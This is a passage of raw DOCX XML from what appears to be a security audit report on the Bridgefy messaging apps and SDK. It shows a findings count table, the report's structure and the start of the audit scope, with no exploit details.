        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="7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560"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="1600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF1CC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="107"/>
              <w:ind w:left="5" w:right="34"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Identified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-10"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF1CC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="107"/>
              <w:ind w:left="5" w:right="74"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF1CC"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="107"/>
              <w:ind w:left="94"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2560" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="34" w:right="29"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="74" w:right="69"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="105"/>
              <w:ind w:left="5"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regarding the privacy audit (WP6), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7ASecurity </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>directly answers 12 privacy-related questions with a confidence level ranging from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Unclear </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. These are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>described in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>Privacy Analysis Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>section of this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Moving forward, the scope section elaborates on the items under review, and the findings section documents the identified vulnerabilities followed by hardening recommendations with lower exploitation potential. Each finding includes a technical description, a proof-of-concept (PoC) and/or steps to reproduce if required, plus mitigation or fix advice for follow-up actions by the development team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally, the report culminates with a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>providing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>detailed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>commentary,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>analysis, and guidance relating to the context, preparation, and general impressions gained throughout this test, as well as a summary of the perceived security posture of the Bridgefy solution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487588864">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>279693</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="13" name="Graphic 13"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="13" name="Graphic 13"/>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22.023073pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15727616;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape6" coordorigin="1440,440" coordsize="2880,0" path="m1440,440l4320,440e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://play.google.com/store/apps/details?id=me.bridgefy.main&amp;hl=en&amp;gl=US</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://apps.apple.com/us/app/bridgefy-offline-messages/id975776347</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250053" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="353"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>outlines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>items</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>project:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>apps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Versions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Android:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.0.15,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.0.16,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.0.17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>274</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2879" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-app-android/tree/staging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2880" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2880" w:right="385" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-app-ios/tree/configuration/stag</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>ing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WP2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Audited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2879" w:val="left" w:leader="none"/>
        </w:tabs>
